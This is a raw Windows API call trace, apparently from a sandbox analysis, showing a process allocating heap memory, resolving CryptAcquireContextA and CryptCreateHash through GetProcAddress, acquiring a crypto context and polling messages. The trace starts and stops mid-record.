HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0185.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0185.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0185.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0185.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0185.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0185.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0185.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0185.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0185.816] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0185.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0185.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0185.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0185.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0185.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0185.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0185.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0185.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69b28 [0185.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0185.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0185.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0185.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0185.817] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0185.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0185.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0185.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0185.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0185.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0185.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0185.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0185.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0185.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0185.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0185.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0185.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0185.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0185.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0185.818] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0185.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0185.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0185.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0185.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0185.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0185.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0185.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0185.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0185.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0185.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0185.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0185.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0185.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0185.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0185.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0185.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0185.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0185.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0185.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0185.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0185.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0185.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0185.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0185.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0185.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0185.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0185.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0185.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0185.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0185.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0185.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0185.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0185.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0185.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0185.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0185.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0185.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0185.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0185.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0185.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0185.821] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0185.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0185.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0185.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0185.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0185.822] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0185.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0185.822] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0185.822] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0185.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0185.822] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0185.822] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.822] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.822] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0185.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0185.822] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0185.822] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0185.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0185.822] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0185.822] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0185.822] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0185.822] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0185.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0185.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0185.823] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0185.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0185.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0185.823] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0185.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0185.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0185.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0185.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0185.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0185.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0185.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0185.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0185.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0185.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0185.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0185.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0185.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0185.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0185.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0185.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0185.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0185.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0185.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0185.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0185.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0185.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0185.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0185.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0185.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0185.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0185.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0185.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0185.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0185.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0185.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0185.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0185.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0185.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0185.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0185.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0185.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0185.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0185.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0185.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0185.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0185.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0185.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0185.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0185.825] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0185.825] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0185.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0185.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0185.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0185.825] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.825] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0185.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0185.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0185.826] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0185.826] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0185.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0185.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0185.826] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0185.826] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0185.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0185.826] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0185.826] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0185.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0185.826] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0185.826] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0185.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0185.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0185.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0185.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0185.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0185.826] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.826] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0185.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0185.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0185.827] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0185.827] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0185.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0185.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0185.827] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0185.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0185.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0185.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0185.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0185.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0185.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50c98, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0185.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0185.828] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0185.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0185.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0185.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0185.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0185.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0185.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0185.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0185.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0185.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0185.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0185.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 